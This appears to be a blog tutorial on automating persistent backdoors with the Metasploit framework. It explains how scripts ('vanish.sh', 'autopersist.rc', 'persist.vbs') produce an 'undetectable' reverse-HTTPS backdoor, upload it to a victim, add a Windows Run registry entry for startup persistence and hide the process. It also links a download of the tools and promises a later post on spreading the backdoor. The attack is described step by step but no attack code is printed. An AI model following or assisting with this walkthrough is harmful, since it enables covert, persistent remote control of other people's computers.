Today we will be automating persistent backdoors on our target using metasploit framework. Lot’s of fun! 😀
In an earlier video, we have seen how to craft an undetectable backdoor using the metasploit framework tools. Today, we are going to automate the process of sending such a backdoor to our victim(s) so that our handler works much like a RAT (remote administration tool) and accepts reverse https connections simulteaniously.
To start, we will need the following libraries:
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils zip unzip
How does it work?
We will use the vanish script to create our undetectable backdoor, and launch the metasploit framework using the autopersist script. In turn, autopersist waits for the victim to execute the backdoor for the first time. Once they do, it will automatically interact with the session and upload the needed files (persist.vbs (VBScript), reverse.exe (backdoor)). Then, autopersist adds an entry to the windows ‘Run’ registry which executes files at startup. Don’t worry, the backdoor is hidden as soon as it is executed and the only way to see it is through taskbar.
* Read these instructions and place scripts in the right directories or problems will arise.
vanish.sh: Place this script in the root of framework folder (in bt5r1: /pentest/exploits/framework/). If you would like to change payload, will have to edit it manually. Peep this script before executing to make sure it fits your needs, and don’t forget to chmod +x it. This script is the efforts of astr0baby, vanish3r and deathc0rps ~credits go to them.
autopersist.rc: Place this script in the meterpreter scripts folder (in bt5r1: /pentest/exploits/framework/scripts/meterpreter/). Here you will have to manually insert the LHOST & LPORT, so peep this before executing it. This script is minimally edited by me, all credits go to chris from OMGSecurity.
persist.vbs: Place this script in /var/www/ it is sent to the victim by autopersist.rc, and will run every x amount of seconds. As default I left 200000, which is around 4 minutes. Gives a seemless feel to the attack, but you might wait a while before you get your shell. If you wish to stop getting a shell back from the victim(s), simply kill the ‘wscript.exe’ process ~as show in video below.
reverse.exe: This is a copy of the backdoor.exe created by vanish, it is automatically copied to /var/www/ by the script.
Click here to download the files: [ DOWNLOAD ]
Check out the video in fullscreen and high quality!
Note: This video is regarding “automating persistent backdoors”, as the title suggests. Spreading the backdoor and techniques for such are out of the scope of this tutorial and will perhaps make their way in a future video. There is also a previous video to this where I go over encoding the backdoor here.